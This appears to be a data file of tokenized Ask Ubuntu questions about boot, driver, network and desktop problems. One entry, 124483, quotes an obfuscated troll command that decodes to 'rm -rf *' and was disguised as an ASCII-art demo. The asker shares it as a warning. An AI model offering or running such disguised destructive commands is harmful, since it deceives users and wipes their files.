124331	sound player that will load multiple tracks but wo n't play each sequentially ?	i 'm looking for a sound or video player that will : play one ( and only one ) of a set of tracks on demand , play a track with minimal interaction ( ideally a single click ) , and either load multiple tracks into memory , or somehow load tracks from disk without much of a pause . i 've tried a handful of movie/music players , and they all see to want to play through an entire playlist rather than just a single track . re-loading each track when it 's required is both a hassle and does n't have the response time i 'm looking for , perhaps because i 'm using a netbook . is there a player out there that might work better for me ?
124334	ca n't boot edd information not available	recently , i decided to dual boot my mac with ubuntu 12.04 beta2 . not sure what i changed , but now i ca n't boot into ubuntu , a live cd , or os x . when i try to boot ubuntu in recovery mode ( as for some reasion i can access the grub menu ) , the last two lines say : [ 1.160316 ] bios edd facility v0.16 2004-jun-25 , 0 devices found [ 1.160381 ] edd information not available . am i able to recover my computer ?
124335	how do i stop unity from remembering search history ?	is it possible to stop unity from remembering the past search history ? if i search for `` settings '' and then close and reopen the unity dash , the word `` settings '' is still in the search bar . i want to do a new search , not an old one .
124339	how do i recover the cool unity graphical interface after installing dual monitors ?	i just got a second monitor so i can have dual screens on my desktop computer . upgrading to 12.04 , using bios to set my main graphic processor to `` onboard '' , and changing the nvidia x server settings to the `` seperate x screen '' configuration , i was able to succeed in getting dual monitors , which i am very proud to have accomplished . the sacrifice seems to have been that i lost some of the cool effects of the sliders , [ alt ] + [ tab ] changer looks like windows 95 , the workspace changer does n't work , i can not access my display preferences outside of the nvidia x server . when i go to display preferences , i get this pop-up `` could not get screen information '' `` randr extension is not present '' . i could be wrong , but it looks like the effects of unity were disabled when nvidia took over the display preferences . how do i return my computer to the fresh look i had when i first installed precise pangolin and have dual monitors at the same time ? more info : my main monitor is plugged into my graphics card expansion listed as nvidia corporation gt218 [ geforce 210 ] , my secondary monitor is plugged into the vga port in my motherboard 's i/o panel which is listed as nvidia corporation c61 [ geforce 7025 / nforce 630a ] . i have the accelerated graphics driver `` nvidia accelerated graphics driver ( post release updates ) ( current version updates ) '' installed . here 's my hardware specs from typing sudo lshw . http : //pastebin.ubuntu.com/944869/ . also i ran libgl_debug=verbose glxinfo and got this : http : //pastebin.ubuntu.com/944871/ this is what i got when i entered this command : lspci -nn | grep vga 00:0d.0 vga compatible controller [ 0300 ] : nvidia corporation c61 [ geforce 7025 / nforce 630a ] [ 10de:03d6 ] ( rev a2 ) 02:00.0 vga compatible controller [ 0300 ] : nvidia corporation gt218 [ geforce 210 ] [ 10de:0a65 ] ( rev a2 ) my motherboard model is asrock n68-vs3 ucc
124340	lost password , administrative account deleted , trying to connect to new wifi and being asked for password	not sure how this happened but ... when i installed 11.10 i did not create a password , when my son added his account to the mahine somehow his account became the administrative account . i know this because everytime i had to connect to a new wifi location the machine would ask for the administrative password and the one that worked was his account password . his account has been deleted from the machine , i tried to connect to a new wifi and am being asked for the administrative password . i entered what his used to be and it is not accepting it . i have tried several methods to try and reset the administrative password but at every point i am being asked for the password before i can proceed . starting to think i am going to have to reinstall ubuntu to solve this any help ?
124346	how can i bidirectionally sync my documents folder to google docs silently and in the background ?	i love the online accounts integration feature of unity ... that is , i would if there were apps to support the feature . thunderbird and gwibber do , but they wo n't run silently or in the background , i 'd settle for just running minimized at startup . what i am looking for is a way bidirectionally sync my documents folder to google docs silently and in the background , as well as a way to get the existing services ( tbird , gwibber ) to run silently ( which is what i think this feature is aiming at eventually ) . i have tried both google-docs-fs and gdocsfs , but neither offer file conversion ( and i ca n't get either to work anyway ) . superflexible file manager offers this feature , but does not offer a way to start in the background or minimized and i ca n't get devilspie to run in unity , plus sffm is proprietary . running it at start up to keep everything synced in real time puts the application `` in my face '' as soon as i start the pc . conduit is great for picasa and facebook sync , but it is n't bidirectional with gdocs ( it will only push to gdocs , not download ) . it does at least run in the background . does anyone know how to force sffm to run minimized or in the background ? i would love to get thunderbird and gwibber running silently or in the background as well . can anyone help me get devilspie to work ( its installed but does nothing when i double click , trying to start from terminal closes the terminal but never opens the program , is devil not intended for use on unity or am i missing something ? ) . gdocsfs gives an error message that the local mount point does not exist [ robbie/documents/something ] ? are their any other options i can use ?
124351	screen resolution problem	i 've been playing with ubuntu for just a few days and so far i really like it . but i am having a few problems more specifically my screen resolution . i 'm running 11.04 ( natty ) kernel linux 2.6.38-14-generic gnome 2.32.1 on a dell dimension 2400 with my on bord graphic card intel corporation 82845g/gl [ brookdale-g ] /ge chipset integrated graphics device ( rev 01 ) . i try changing it using the xrandr command but all i get is xrandr : failed to get size of gamma for output default my monitor is unknown and the resolution is 1280 x 1024 with a refresh rate of 0hz rotation normal and while i 'm not sure what it should be i know that everything is way to small for me to see without blowing it up a few times . and i 'm not really sure what else i can do . any help would be welcome .
124352	can i connect to itunes music shares using amarok ?	the amarok manual claims : amarok automatically shows the tracks from the server in the media sources - > local music pane and no further configuration is required . but amarok did not automatically work with no configuration : what am i doing wrong ? i 've confirmed that sharing is enabled in itunes , and that the share is visible in rhythmbox , so i believe the problem is within amarok . how can i make amarok connect to the share ?
124354	how to disable usb port ?	i am using ubuntu 10.10 . i want to disable my usb port due to some resign . so how i can disable my usb port and after that how i can enable it..
124363	tried several install methods ... none work	first let me start off by saying that i am new to linux so please attempt to keep any linux specific jargon to a minimum or explain the terms : -d. i am attempting to perform a dual install with windows 7 already installed . i have set aside a 30 gb partition for the ubuntu install . machine specs : alienware m14x nvidia gt 555m and intel hd 3000 8gb ram @ 1600mhz second gen i7 @ 2.4ghz turbo to 3.5ghz i have attempted to install with wubi as well as from a usb stick several times each . i have attempted installing wubi on my main windows partition as well as the partition set aside for ubuntu . i have attempted to install both the 32-bit and 64-bit versions of ubuntu via the usb stick . every single time the install process appears to stall out in the command prompt after a restart . when booting wubi i can choose which os i 'd like to boot at which point i run through about 10 seconds of command prompt spam until the system simply stops . when booting from usb i get the basic ubuntu screen asking me to choose to either boot from usb or go ahead and install to hard disk and it does not matter which i choose . after about 25 seconds of command line spam the boot process spams the same message over again devd [ insert number here ] : timeout ... it does this for two minutes until it states that the timeout has reached 120 seconds and stops . i would really love to get this working and i do have a basic working knowledge of my bios etc ... . i just could n't find anything specifically relating to the problem i 'm describing . regardless of my install method choice , the process seems to stall out during the command line loading but at different points . thanks in advance
124373	hp dm4-3060ef beats edition - will it be all ok with ubuntu ?	i will have in a few days this laptop ( hp dm4-3060ef beats edition ) and i want to know if all is working with it . for example , how about hp coolsense ? does anybody else have the same laptop ?
124380	shortcut to open/focus terminal window	i am using shortcut ctrl+alt+t for opening a new terminal window . i am using one of the terminal very often ( calculator and simple commands ) and i want to set up another shortcut ( like ctrl+alt+r or any other , i do n't care ) to switch to this specific terminal window ( using gnome-terminal in unity , ubuntu 12.04 ) . is this possible ( and how ) ?
124381	install ubuntu 12.04 via 1gb usb ?	is it possible to use a 1gb usb as an installer of ubuntu 12.04 ?
124383	ubuntu one used to work on windows 7 until upgrade	ubuntu one used to work well on my windows 7 machine . last week after opening it i received a message asking me if i wanted to upgrade to a newer version . i accepted and the upgrade installed . now the program does n't load at all . i have tried uninstalling and re-installing without success . can you please help as i use it on my windows 7 and ubuntu machines as well as an android device .
124384	how to let an icon in the launcher wiggle ?	trying to let my python application inform the user by wiggling or shaking its icon in the launcher , i found : wiggling seems to be the `` urgent animation '' : how can i change the wiggle time of 'urgent animation ' in unity launcher ? https : //wiki.ubuntu.com/unity/launcherapi describes an api with a function to set an urgent flag on a laucherentry . but the vala example does n't use it and the python example does n't show any visual effect on my ubuntu 11.10 for setting ( or clearing ) the `` urgent '' property ( progress and count are working ) . the example python code does not use the api-c function unity_launcher_entry_set_urgent , but writes to the property directly , which maybe is the problem ( and means not using the api in an api documentation example ... ) so , i am looking for a working python `` wiggle '' example . or a working c example . or some hints , why this is not working .
124389	is there a way to force lubuntu to recognize my touchpad although i am using the boot option âacpi=offâ ?	i have just gone through a pretty rough installation on an old laptop and for some reason it wont recognize my touchpad . the synaptics folder is entirely missing ... the xinput list shows that i have a pointer ( that must be the touchpad ) , but the synaptiks software wo n't recognize the touchpad at all . for some reason it doesnt load due to my boot option . is there a way to find out why or a device manager or something ? notes : i am currently booting lubuntu with the boot option `` acpi=off '' ; and tired acpi=off noapic nolapic and several combinations of these 3 . plus ... .acpi.power_nocheck=1 and acpi_osi=linux , apm=off and noapm . the acpi.power_nocheck=1 worked for a few hours that it started to give me error messages of high core temperature . an attached mouse works just fine .
124390	how can i install ubuntu on a macbook air ?	how can i install ubuntu on a macbook air ? i want it to dual boot , is it possible ? do i have any benefits by install ubuntu or linux ? since os x has unix tools like bash , is n't is the same ?
124398	gui tool for watermarking photos and other images	parents asked me if they can watermark their photos . by `` watermark '' i mean a small signature in a corner . i made phatch scenario which they run they need . but it looks like phatch breaks rotation exif tag and scaling is not very advanced too . so i 'm looking for a tool that will allow non-technical people to watermark images . preferably , with automatic colour picker ( it should choose invert colour for watermark ) . os x has a good example -- bronson watermarker .
124399	laptop screen goes blank after waking from sleep	i have been facing this issue from the last week after some update . whenever my laptop wakes up from suspend state it just shows me a blank screen . regardless of whatever i do ( move my mouse , press keyboard buttons ) it just refuses to wake up . i am forced to do a restart and lose all my unsaved files . has this issue been reported for ubuntu 12.04 ? i am using a lenovo x200 with intel mobile 4 series graphics chipset . please let me know if any body has found a fix for this .
124402	how can i enable visual effects ?	i want to enable visual effects on my laptop with this specifications : ubuntu 11.10 lenovo s100 cpu : intel atom cpu n570 @ 1.66 ghz x 4 graphics : unknown ? os type : 32 bit disk : 312.9 gb how can i do that safely ?
124403	how to add keyboard layout switcher to top panel ?	i 'm using ubuntu 10.04 . i 've accidentally removed the keyboard layout switcher from my top panel and i do n't know how to get it back . does someone on here have the answer ?
124404	is there an application that will render the popular web video formats ?	i am trying to convert video to the formats commonly used for html5 embedding â that is , mp4 ( h264 + aac ) , ogv ( theora + vorbis ) and webm ( vp8 + vorbis ) . i would like to use a gui application to do this as simply as possible . i have the medibuntu repository installed , but it does n't seem to help . avidemux is missing the h264 video encoder , and handbrake only does mp4 ( not the other two ) . how can i configure these apps under 11.10 for my purposes , or alternatively , what else is there ?
124405	sharing a folder on local network	i am new to ubuntu and i installed the ubuntu 11.10 on my system . i want to share a folder on my local network . how can i do that ? i want to share a folder by right click on it . when i do this then it say to install the samba and when i try to install the samba then it show some files not found on ubuntu server . on installation process time i got the error lik root @ sys : ~ # sudo apt-get install samba reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libwbclient0 samba-common smbclient suggested packages : openbsd-inetd inet-superserver smbldap-tools ldb-tools cifs-utils the following new packages will be installed : samba the following packages will be upgraded : libwbclient0 samba-common smbclient 3 upgraded , 1 newly installed , 0 to remove and 372 not upgraded . need to get 23.3 mb of archives . after this operation , 23.0 mb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! libwbclient0 smbclient samba-common samba install these packages without verification [ y/n ] ? y err http : //np.archive.ubuntu.com/ubuntu/ oneiric-updates/main libwbclient0 i386 2:3.5.11~dfsg-1ubuntu2.1 404 not found err http : //np.archive.ubuntu.com/ubuntu/ oneiric-updates/main smbclient i386 2:3.5.11~dfsg-1ubuntu2.1 bad header line err http : //np.archive.ubuntu.com/ubuntu/ oneiric-updates/main samba-common all 2:3.5.11~dfsg-1ubuntu2.1 404 not found err http : //np.archive.ubuntu.com/ubuntu/ oneiric-updates/main samba i386 2:3.5.11~dfsg-1ubuntu2.1 404 not found failed to fetch http : //np.archive.ubuntu.com/ubuntu/pool/main/s/samba/libwbclient0_3.5.11~dfsg-1ubuntu2.1_i386.deb 404 not found failed to fetch http : //np.archive.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.5.11~dfsg-1ubuntu2.1_i386.deb bad header line failed to fetch http : //np.archive.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.5.11~dfsg-1ubuntu2.1_all.deb 404 not found failed to fetch http : //np.archive.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.5.11~dfsg-1ubuntu2.1_i386.deb 404 not found e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
124413	screen stays black after waking up from suspend	i installed ubuntu 12.04 on hp dm4 beats edition and the suspend and wake up were working perfectly , but after an update i ca n't see 'caps lock ' light , wireless light etc , the fan is running but the screen stays black . anyone else has spotted this ? is this a bug ? any idea how to fix it ?
124414	how to customize window borders and controls ?	i want to use themes from gnome art , but i ca n't find where to configure control/window border/icons in ubuntu 12.04 .
124417	keyboard shortcut : win key does n't work for custom commands	it 's all ok before upgraded from 10.04 to 12.04 . it seems all right . in keyboard shortcut window , if i pressed win+v , it can capture the key combination as super+v , no problem . i 've checked the output from xev utility , the left and right win keys are translated to super_l and super_r correctly . i have found a workaround , though . using gconf-editor , edit the entries /desktop/gnome/keybindings/*/binding and replace < super > with < mod4 > for the problem bindings . however super+ ... keys do work for most built-in actions such as `` switch workspace '' , they just do n't work for custom commands .
124420	problem after upgrading ubuntu 10.10 to 11.04 : wireless is dissabled by hardware switch on acer 4736	i have a problem with my wireless connection on acer aspire 4736 after upgrading ubuntu 10.10 to 11.04 . anyone help ? thanks in advance ,
124421	laptop brightness indicator	i have developed a brightness indicator for unity in python . i change the brightness using the following system call : echo 4 > /sys/class/backlight/acpi_video0/brightness [ value = 0 to 9 ] problem is this command needs root access . because of brightness file 's permission : -rw-r -- r -- 1 root root 4096 2012-04-23 17:36 /sys/class/backlight/acpi_video0/brightness so i just change the file 's permission to 775 . it worked . but after reboot the file 's permission change again . now it can not be done because permission denied . how can i do this without root permission ? thanks in advance
124423	how to establish a phone call remotely via ubuntu ?	i 'd like to be able to establish a phone call in this procedure , tunnel my voice from pc called a to pc called b b had modem with phone line connected so how to establish phone call remotely ? both pc has ubuntu installed can ubuntu do this task
124424	huge performance issues with nvidia geforce 7100	there are several reports that say that there are serious performance issues using 12.04 and nvidia 7100 . are there any work-a-round in sight ?
124425	how to get midi output from a windows application via wine	i develop a windows application and am curious whether it works via wine . the application runs fine with wine but i get no sound . in fact , i 'm not sure whether my ubuntu installation has midi capabilities . the sound output settings shows `` lfe on separate mono output '' one with `` no amplifier '' and another with `` amplifier '' . they both function . i am using ubuntu 12.04 as a client on virtualbox that runs on windows 7 . thanks for any suggestion ! edit : virtual box hosted by windows 7 , ubuntu running as a client in virtualbox .
124426	more than 2 gb ram useful running default apps ?	i find ubuntu 64bit to be a little slow on my notebook with a core i5 and 2 gb of ram . especially alt+tab takes some time to show up sometimes . i mostly run chromium , thunderbird , libreoffice writer , banshee and pdfviewer . right now i 'm just running the first two plus ubuntuone in the background and there 's 87 % ram used . should i upgrade to 4 gb ?
124427	terminal window not showing password	when i open a terminal and it asks for my password i ca n't type in the pw because the keyboard wont react . it works fine anyother time . just not then .
124432	recovering very important lost data from ntfs partition	i have a 230 gigs hdd on my laptop , i have 50 gigs extended for my linux , i have 80 gigs empty ntfs partition , and 100 gigs ntfs partition where i store all my important data , ( i have about 50 gigs of important things ) today i mounted the 100 gigs partition took something from it , unmounted it back , and then when i mounted it again it was empty ! ! ! all the data is gone ! ! ! ! i used to mount it via the terminal : sudo mount ntfs /dev/sda5 /media/e where e is a dir that i make ( when i make it i change the permissions of media to 777 then after creating the dir , i change it back to normal ) guys you cant imagine how much this data is important to me , plz help , thnx in advance
124438	do the tasks on the active workspace have higher priority ?	for this time i wo n't bother anyone with technical problems . i just had a philosophical question . well it 's in the title , i guess it 's clear enough : p well actually the question is more general : what are workspaces ? do they differ only by what is displayed on it ( the processes being totally independently defined/prioritized ) ? or do they really kindof own or are connected to the applications you launch on them ? yop , that 's all ! thanks you for reading ! julien
124442	installing matplotlib 1.1.0 on ubuntu 11.10	i installed matplotlib 1.1 from source , but i cant get any plot to show . python setup.py build shows the following : building matplotlib matplotlib : 1.1.0 python : 2.7.2+ ( default , oct 4 2011 , 20:06:09 ) [ gcc 4.6.1 ] platform : linux2 required dependencies numpy : 1.5.1 freetype2 : 12.2.6 optional backend dependencies libpng : 1.2.46 tkinter : no * using default library and include directories for * tcl and tk because a tk window failed to open . * you may need to define display for tk to work so * that setup can determine where your libraries are * located . tkinter present , but header files are not * found . you may need to install development * packages . ( setup.py:14683 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( setup.py:14683 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( setup.py:14683 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( setup.py:14683 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , pkg-config : looking for pygtk-2.0 gtk+-2.0 * package pygtk-2.0 was not found in the pkg-config * search path . perhaps you should add the directory * containing `pygtk-2.0.pc ' to the pkg_config_path * environment variable no package 'pygtk-2.0 ' found * you may need to install 'dev ' package ( s ) to * provide header files . gtk+ : no * could not find gtk+ headers in any of * '/usr/local/include ' , '/usr/include ' , ' . ' mac os x native : no qt : no qt4 : no cairo : 1.8.8 optional date/timezone dependencies datetime : present , version unknown dateutil : 1.4.1 pytz : 2011c optional usetex dependencies dvipng : no ghostscript : 9.04 latex : no pdftops : 0.16.7 but i think i already have tkinter and gtk libraries . any help ?
124454	is it possible to use ifconfig to switch an interface to dhcp and if not , what is the best way ?	i have just set up a new ubuntu server and i am going to be doing a lot of networking tests . during setup , i simply skipped the network step . i now need to switch between dhcp and an address quite often . i know i can easily give a port an address via ifconfig eth0 x.x.x.x netmask x.x.x.x , but , is there an alternative that can be used in order to set a port to use dhcp ? if this is n't possible , i am guessing i can default in /etc/network/interfaces to dhcp and then just use up/down or restart networking in order to apply ... but , i would much rather use ifconfig .
124456	is there a way to disable changing the background in gnome ?	i am setting up ubuntu 12.04 with gnome3 for a computer lab . i do n't want the users to be able to change the background of the computer . is there a way to prevent this ? or to revert the background back when the computer reboots ?
124459	bind ( hardlink ) one directory to many places	i need to `` bind '' one directory to many chrooted places . i know that i can do `` mount -o bind '' , but this requires special processing on startup each time ( run the mount ) . is there a way to do it on filesystem directly ? my fs is ext4 and it seems not to support hardlinks to directories . hardlinking all files inside is not an option too . is thee a way to enable hardlinks to directories in ext4 ?
124461	bcm43225 not working on lubuntu 12.04 64 bit	the broadcom wireless card bcm43225 is not working . i have tried with proprietary drivers and firmware-b43-installer package , with or without acer-wmi blacklisted . the card is not soft/hard blocked . output of 'rfkill list' 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no can you suggest something ? lubuntu 12.04 beta 2 kernel 3.2.0-23-generic x86_64 04:00.0 network controller [ 0280 ] : broadcom bcm43225 rev 01 [ 14e4:4357 ] acer travelmate 5735 stefano
124465	how do i shrink the root logical volume ( lv ) on lvm ?	i don’t need to actually shrink the mbr partition , just the logical volume that contains the root “/” filesystem . it’s ~200gb now , and i need to shrink it to ~150gb to make room for a new logical volume . how do i go about this ?
124474	how can i find out what version of an application will be in 12.04 ?	specifically , will libreoffice version 3.5 be included in pangolin ( 12.04 ) ? but more generally - i do n't know how to determine what software packages are present in various ubuntu releases . is that information available somewhere ?
124481	does canonical have any plans for selling/certifying laptop hardware ?	one large advantage for apple and their developers , is that they get to pick the hardware they want to support . ubuntu , and linux in general , needs a great deal of extra complexity due to the need to deal with so many variations of hardware combinations . it seems to me that linux in general could gain a great deal from a company such a canonical building or certifying their own computers . ubuntu would still be supported on `` everything '' , but certain hardware would just be a lot better tested . canonical also seems to be in a position where they could do this , as well as earn both extra money and users on it . i know that there 's a android version of ubuntu coming up , which is somewhat similar in thought , hence my question is directed at laptops . has there been , or are there , any such plans . why ( not ) ?
124482	ubuntu 12.04 beta compiz error : `fatal : could n't open display :0`	i 'm getting the following error after upgrading from 11.10 to 12.04 beta . even with daily patch updates , it has n't resolved itself so i 'm putting it out there . ubuntu 12.04 beta compiz error : fatal : could n't open display :0 basically : when i boot up , the screen shows the ubuntu loading briefly , for a seconds and then drops to a terminal login screen . i have an ati card , used to have my own compiled driver installed on 11.10 , not sure if that was overwritten by the upgrade . update when trying to install the fglrx driver i get an error similar to this : ( i ca n't screenshot or copy paste in the console , so i 'm writing it out on a different computer : dpkg : error processing /var/cache/apt/archives/fglrx_2 % 3a8.960-0ubuntu1_amd64.deb ( -- unpack ) : subprocess error satus 1 update 2 gedit /etc/ati/fglrx-uninstall.log > *** amd catalyst ( tm ) proprietary driver uninstall log 2012-04-23 14:02:52 *** forcing uninstall . removed > /usr/share/applications/amdcccle.desktop removed > /usr/share/applications/amdccclesu.desktop removed > /usr/share/icons/ccc_large.xpm md5sum integrity check failed . force > option removes /usr/share/ati/amdcccle/amdcccle_cs.qm md5sum integrity > check failed . force option removes > /usr/share/ati/amdcccle/amdcccle_da_dk.qm md5sum integrity check > failed . force option removes /usr/share/ati/amdcccle/amdcccle_de.qm > md5sum integrity check failed . force option removes > /usr/share/ati/amdcccle/amdcccle_el_gr.qm md5sum integrity check > failed . force option removes > /usr/share/ati/amdcccle/amdcccle_es_es.qm md5sum integrity check > failed . force option removes > /usr/share/ati/amdcccle/amdcccle_fi_fi.qm md5sum integrity check > failed . force option removes > /usr/share/ati/amdcccle/amdcccle_fr_fr.qm md5sum integrity check > failed . force option removes > /usr/share/ati/amdcccle/amdcccle_hu_hu.qm md5sum integrity check > failed . force option removes > /usr/share/ati/amdcccle/amdcccle_it_it.qm md5sum integrity check > failed . force option removes /usr/share/ati/amdcccle/amdcccle_ja.qm > md5sum integrity check failed . force option removes > /usr/share/ati/amdcccle/amdcccle_ko_kr.qm md5sum integrity check > failed . force option removes > /usr/share/ati/amdcccle/amdcccle_nl_nl.qm md5sum integrity check > failed . force option removes /usr/share/ati/amdcccle/amdcccle_no.qm > md5sum integrity check failed . force option removes > /usr/share/ati/amdcccle/amdcccle_pl.qm md5sum integrity check failed . > force option removes /usr/share/ati/amdcccle/amdcccle_pt_br.qm md5sum > integrity check failed . force option removes > /usr/share/ati/amdcccle/amdcccle_ru_ru.qm md5sum integrity check > failed . force option removes > /usr/share/ati/amdcccle/amdcccle_sv_se.qm md5sum integrity check > failed . force option removes /usr/share/ati/amdcccle/amdcccle_th.qm > md5sum integrity check failed . force option removes > /usr/share/ati/amdcccle/amdcccle_tr_tr.qm md5sum integrity check > failed . force option removes > /usr/share/ati/amdcccle/amdcccle_zh_cn.qm md5sum integrity check > failed . force option removes > /usr/share/ati/amdcccle/amdcccle_zh_tw.qm removed > /usr/share/ati/amdcccle/qt_de.qm removed > /usr/share/ati/amdcccle/qt_es.qm removed > /usr/share/ati/amdcccle/qt_fr.qm removed > /usr/share/ati/amdcccle/qt_ja_jp.qm removed > /usr/share/ati/amdcccle/qt_pl.qm removed > /usr/share/ati/amdcccle/qt_pt.qm removed > /usr/share/ati/amdcccle/qt_ru.qm removed > /usr/share/ati/amdcccle/qt_sv.qm removed > /usr/share/ati/amdcccle/qt_zh_cn.qm removed > /usr/share/ati/amdcccle/qt_zh_tw.qm installed file is missing from > system /usr/bin/amdcccle . removed /usr/bin/amdxdg-su removed > /usr/bin/amdupdaterandrconfig removed > /usr/share/doc/ati/ccc_copyrights.txt removed > /etc/security/console.apps/amdcccle-su removed > /usr/share/ati/lib64/libqtcore.so.4 removed > /usr/share/ati/lib64/libqtgui.so.4 removed > /usr/share/doc/ati/license.txt removed > /usr/share/doc/ati/user-manual/index.html removed > /usr/share/doc/ati/examples/etc/init.d/atieventsd.sh removed > /usr/share/doc/ati/examples/etc/acpi/ati-powermode.sh removed > /usr/share/doc/ati/examples/etc/acpi/events/a-ac-aticonfig removed > /usr/share/doc/ati/examples/etc/acpi/events/a-lid-aticonfig removed > /usr/share/doc/ati/articles/1gbhang.html removed > /usr/share/doc/ati/articles/4461.html removed > /usr/share/doc/ati/articles/4462.html removed > /usr/share/doc/ati/articles/4463.html removed > /usr/share/doc/ati/articles/4464.html removed > /usr/share/doc/ati/articles/4469.html removed > /usr/share/doc/ati/articles/4470.html removed > /usr/share/doc/ati/articles/4475.html removed > /usr/share/doc/ati/articles/4478.html removed > /usr/share/doc/ati/articles/4479.html removed > /usr/share/doc/ati/articles/4480.html removed > /usr/share/doc/ati/articles/4481.html removed > /usr/share/doc/ati/articles/4482.html removed > /usr/share/doc/ati/articles/4483.html removed > /usr/share/doc/ati/articles/4484.html removed > /usr/share/doc/ati/articles/4485.html removed > /usr/share/doc/ati/articles/corruptstereo.html removed > /usr/share/doc/ati/articles/corruptvtswitch.html removed > /usr/share/doc/ati/articles/devshm.html removed > /usr/share/doc/ati/articles/dga3dhang.html removed > /usr/share/doc/ati/articles/doom3corrupt.html removed > /usr/share/doc/ati/articles/dualheadvideo.html removed > /usr/share/doc/ati/articles/laptopsuspend.html removed > /usr/share/doc/ati/articles/missingdrmheaders.html removed > /usr/share/doc/ati/articles/mousecursorhang.html removed > /usr/share/doc/ati/articles/no3d-aiw8500dv.html removed > /usr/share/doc/ati/articles/no3d-kt400.html removed > /usr/share/doc/ati/articles/nomembercount.html removed > /usr/share/doc/ati/articles/pcie3dmemoryleak.html removed > /usr/share/doc/ati/articles/r420blankdisplay.html removed > /usr/share/doc/ati/articles/rv280dviblankdisplay.html removed > /usr/share/doc/ati/articles/rv350springdale.html removed > /usr/share/doc/ati/articles/secondheadcorruption.html removed > /usr/share/doc/ati/articles/xf86_enodev.html removed > /usr/share/doc/ati/articles/xrestartpcie.html removed > /usr/share/doc/ati/articles/xvsatshift.html removed > /usr/share/doc/ati/configure.html removed > /usr/share/doc/ati/driverfaq.html removed > /usr/share/doc/ati/index.html removed > /usr/share/doc/ati/installer.html removed > /usr/share/doc/ati/issues.html removed > /usr/share/doc/ati/linuxfaq.html removed > /usr/share/doc/ati/tips-linux.html removed > /usr/share/man/man8/atieventsd.8 removed > /usr/lib/xorg/modules/linux/libfglrxdrm.so removed > /usr/lib/xorg/modules/drivers/fglrx_drv.so removed > /usr/lib/xorg/modules/glesx.so removed /usr/lib/xorg/modules/amdxmm.so > removed /usr/lib32/libamdxvba.cap removed /usr/lib32/libamdxvba.so.1.0 > removed /usr/lib32/libopencl.so.1 removed > /usr/lib32/libslotmaximizerag.so removed > /usr/lib32/libslotmaximizerbe.so removed /usr/lib32/libxvbaw.so.1.0 > removed /usr/lib32/libamdocl32.so removed /usr/lib32/libatiadlxx.so > removed /usr/lib32/libaticalcl.so removed /usr/lib32/libaticaldd.so > removed /usr/lib32/libaticalrt.so removed /usr/lib32/libatiuki.so.1.0 > removed /usr/lib32/libfglrx_dm.a removed /usr/lib32/libfglrx_dm.so.1.0 > removed /usr/lib32/fglrx/fglrx-libgl.so.1.2 removed > /usr/lib/fglrx/switchlibgl removed /usr/lib/fglrx/switchlibglx removed > /usr/lib32/dri/fglrx_dri.so removed > /usr/lib/xorg/modules/extensions/fglrx/fglrx-libglx.so removed > /usr/lib/libamdxvba.cap removed /usr/lib/libamdxvba.so.1.0 removed > /usr/lib/libopencl.so.1 removed /usr/lib/libslotmaximizerag.so removed > /usr/lib/libslotmaximizerbe.so removed /usr/lib/libxvbaw.so.1.0 > removed /usr/lib/libamdocl64.so removed /usr/lib/libatiadlxx.so > removed /usr/lib/libaticalcl.so removed /usr/lib/libaticaldd.so > removed /usr/lib/libaticalrt.so removed /usr/lib/libatiuki.so.1.0 > removed /usr/lib/libfglrx_dm.a removed /usr/lib/libfglrx_dm.so.1.0 > removed /usr/lib/fglrx/fglrx-libgl.so.1.2 removed > /usr/lib/dri/fglrx_dri.so removed /usr/include/gl/glati.h removed > /usr/include/gl/glxati.h removed /usr/include/ati/gl/glx.h removed > /usr/include/ati/gl/glxext.h removed /usr/bin/fgl_glxgears removed > /usr/bin/fglrxinfo removed /usr/bin/aticonfig removed > /usr/bin/atiodcli removed /usr/bin/atiode removed /usr/bin/clinfo > removed /usr/src/ati/fglrx_sample_source.tgz removed > /usr/sbin/amdnotifyui removed /usr/sbin/atieventsd removed > /usr/sbin/atigetsysteminfo.sh removed /etc/ati/amdpcsdb.default > removed /etc/ati/atiogl.xml removed /etc/ati/authatieventsd.sh removed > /etc/ati/control removed /etc/ati/logo.xbm.example removed > /etc/ati/logo_mask.xbm.example removed /etc/ati/signature removed > /etc/opencl/vendors/amdocl32.icd removed > /etc/opencl/vendors/amdocl64.icd /usr/bin/md5sum : > /usr/x11r6/lib/modules/dri/fglrx_dri.so : no such file or directory > /usr/bin/md5sum : /usr/x11r6/lib64/modules/dri/fglrx_dri.so : no such > file or directory /usr/bin/md5sum : /usr/bin/amdconfig : no such file or > directory removed /etc/modprobe.d/blacklist-fglrx.conf
124483	i was tricked into copy pasting a command , did it hurt me ?	on an online forum , someone ( i guess just to troll with me ) said to input this into terminal : ( echo 726d202d7266202a | xxd -r -p ) do not put this in because i do n't know if it hurts anything . it returned this in terminal : rm -rf *ryanmcclure @ ryanslinuxbox : ~ $ did this delete anything ? i 'm wondering because i heard rm -rf * is that awful command that deletes everything . edit : just so any one who reads this is aware , i was told to input this to see an ascii art animation in terminal . be warned that this is the trick that was used to fool me .
124488	windows 7 does not boot after wubi install	i wanted to try ubuntu , so i went with wubi . while i like what i see with ubuntu , i 'm now unable to boot windows 7 . i can see both windows7 and ubuntu at boot time . if i select ubuntu , it boots and everything is ok . but windows7 does not boot . i 'm currently travelling and dont have access to my windows install cds . is there anything i can do in the meanwhile to get windows to boot . i will get the clean and proper install once i get back . at present i just need windows working . thanks for the help . here is the results.txt from boot info script . boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > no known boot loader is installed in the mbr of /dev/sda . sda2 : __________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda3 : __________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe /wubildr /ubuntu/winboot/wubildr /wubildr.mbr /ubuntu/winboot/wubildr.mbr 